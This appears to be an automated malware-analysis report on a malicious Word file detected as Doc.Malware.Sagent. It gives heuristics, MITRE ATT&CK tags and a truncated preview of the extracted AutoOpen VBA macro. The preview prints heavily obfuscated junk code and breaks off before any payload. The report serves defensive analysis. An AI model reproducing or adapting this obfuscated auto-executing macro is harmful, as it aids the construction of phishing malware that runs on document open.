MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is a malicious Office document containing a legacy WordBasic AutoOpen macro, as indicated by multiple heuristics. The ClamAV detection name 'Doc.Malware.Sagent-6697295-0' suggests it is a known malware variant. The macro's purpose is to execute malicious code, likely leading to further compromise, consistent with a phishing attachment.
Heuristics 5
-
ClamAV: Doc.Malware.Sagent-6697295-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-6697295-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 67039 bytes |
SHA-256: 3bba2f1fe5cd7a50323184236fdc3930947e0517e4480a3457a7d062a56db828 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Const hOPahiZujAFEqFzbISoZuWuWyNOXoRYrApAqzy = 0 Sub AutoOpen() On Error Resume Next Dim XUwekOpUBUJUDyciUpIMOTupEQIXusAw(4) Dim gatOmakULeQAmuJYhEkATylylO(4) If 11 = 11 + (3 * 0) Then gatOmakULeQAmuJYhEkATylylO(0) = CLng(5370) End If gatOmakULeQAmuJYhEkATylylO(1) = Sqr(3) gatOmakULeQAmuJYhEkATylylO(2) = Month(53705370) gatOmakULeQAmuJYhEkATylylO(3) = Fix(5370.3) Dim SaKuJiHegOKEpATOVOmuWyfYquHasaLoCYi(4) If 13 = 13 + (5 * 0) Then SaKuJiHegOKEpATOVOmuWyfYquHasaLoCYi(0) = CLng(591) End If SaKuJiHegOKEpATOVOmuWyfYquHasaLoCYi(1) = Sqr(5) SaKuJiHegOKEpATOVOmuWyfYquHasaLoCYi(2) = Month(591591) SaKuJiHegOKEpATOVOmuWyfYquHasaLoCYi(3) = Fix(591.5) Dim xemeKyvuGyhuxAxEMidazaHaEzUMygjUkosUViX(4) If 10 = 10 + (3 * 0) Then xemeKyvuGyhuxAxEMidazaHaEzUMygjUkosUViX(0) = CLng(1613) End If xemeKyvuGyhuxAxEMidazaHaEzUMygjUkosUViX(1) = Sqr(3) xemeKyvuGyhuxAxEMidazaHaEzUMygjUkosUViX(2) = Month(16131613) xemeKyvuGyhuxAxEMidazaHaEzUMygjUkosUViX(3) = Fix(1613.3) If 11 = 11 + (6 * 0) Then Dim XanaVOKaMEJUPiVYFEsUpYVWOZLyUgurOVYFudeVul(4) If 12 = 12 + (2 * 0) Then XanaVOKaMEJUPiVYFEsUpYVWOZLyUgurOVYFudeVul(0) = CLng(8042) End If XanaVOKaMEJUPiVYFEsUpYVWOZLyUgurOVYFudeVul(1) = Sqr(2) XanaVOKaMEJUPiVYFEsUpYVWOZLyUgurOVYFudeVul(2) = Month(80428042) XanaVOKaMEJUPiVYFEsUpYVWOZLyUgurOVYFudeVul(3) = Fix(8042.2) XUwekOpUBUJUDyciUpIMOTupEQIXusAw(0) = CLng(1933) Dim KATIidIVonUhiKyLYTuPOHYiGyDanyvUQiTIJ(4) If 11 = 11 + (9 * 0) Then KATIidIVonUhiKyLYTuPOHYiGyDanyvUQiTIJ(0) = CLng(7634) End If KATIidIVonUhiKyLYTuPOHYiGyDanyvUQiTIJ(1) = Sqr(9) KATIidIVonUhiKyLYTuPOHYiGyDanyvUQiTIJ(2) = Month(76347634) KATIidIVonUhiKyLYTuPOHYiGyDanyvUQiTIJ(3) = Fix(7634.9) Dim ZakujEROPodIneleTolvyhibiQYaaMUDIKaguCelUv(4) If 11 = 11 + (1 * 0) Then ZakujEROPodIneleTolvyhibiQYaaMUDIKaguCelUv(0) = CLng(5485) End If ZakujEROPodIneleTolvyhibiQYaaMUDIKaguCelUv(1) = Sqr(1) ZakujEROPodIneleTolvyhibiQYaaMUDIKaguCelUv(2) = Month(54855485) ZakujEROPodIneleTolvyhibiQYaaMUDIKaguCelUv(3) = Fix(5485.1) End If Dim cUQYQumOcEHOVaaialUrnuHAKIQaFeSYDIRY(4) If 13 = 13 + (5 * 0) Then cUQYQumOcEHOVaaialUrnuHAKIQaFeSYDIRY(0) = CLng(8050) End If cUQYQumOcEHOVaaialUrnuHAKIQaFeSYDIRY(1) = Sqr(5) cUQYQumOcEHOVaaialUrnuHAKIQaFeSYDIRY(2) = Month(80508050) cUQYQumOcEHOVaaialUrnuHAKIQaFeSYDIRY(3) = Fix(8050.5) Dim fyKImfaVAXoNYNQABqYREfiZotImoFuHoJi(4) If 11 = 11 + (2 * 0) Then fyKImfaVAXoNYNQABqYREfiZotImoFuHoJi(0) = CLng(5859) End If fyKImfaVAXoNYNQABqYREfiZotImoFuHoJi(1) = Sqr(2) fyKImfaVAXoNYNQABqYREfiZotImoFuHoJi(2) = Month(58595859) fyKImfaVAXoNYNQABqYREfiZotImoFuHoJi(3) = Fix(5859.2) XUwekOpUBUJUDyciUpIMOTupEQIXusAw(1) = Sqr(6) XUwekOpUBUJUDyciUpIMOTupEQIXusAw(2) = Month(19331933) XUwekOpUBUJUDyciUpIMOTupEQIXusAw(3) = Fix(1933.6) Dim HiDIkubwoweQeTiZYzyDoRyBAiApIk(4) If 10 = 10 + (5 * 0) Then HiDIkubwoweQeTiZYzyDoRyBAiApIk(0) = CLng(121) End If HiDIkubwoweQeTiZYzyDoRyBAiApIk(1) = Sqr(5) HiDIkubwoweQeTiZYzyDoRyBAiApIk(2) = Month(121121) HiDIkubwoweQeTiZYzyDoRyBAiApIk(3) = Fix(121.5) Dim geFiRaqEdoqemuSCYtugopiDOVoL(4) Dim JoDEieHiCoiuJOApozIHokiguhdCefxeSUse(4) If 12 = 12 + (6 * 0) Then JoDEieHiCoiuJOApozIHokiguhdCefxeSUse(0) = CLng(2789) End If JoDEieHiCoiuJOApozIHokiguhdCefxeSUse(1) = Sqr(6) JoDEieHiCoiuJOApozIHokiguhdCefxeSUse(2) = Month(27892789) JoDEieHiCoiuJOApozIHokiguhdCefxeSUse(3) = Fix(2789.6) Dim VUioXeJyzIiulAvIvozAZuvIRyd(4) If 12 = 12 + (3 * 0) Then VUioXeJyzIiulAvIvozAZuvIRyd(0) = CLng(4510) End If VUioXeJyzIiulAvIvozAZuvIRyd(1) = Sqr(3) VUioXeJyzIiulAvIvozAZuvIRyd(2) = Month(45104510) VUioXeJyzIiulAvIvozAZuvIRyd(3) = Fix(4510.3) If 12 = 12 + (1 * 0) Then geFiRaqEdoqemuSCYtugopiDOVoL(0) = CLng(9683) Dim RaMavohuCIVUJUmIiYMaFELIBOteg(4) If 10 = 10 + (5 * 0) Then RaMavohuCIVUJUmIiYMaFELIBOt ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.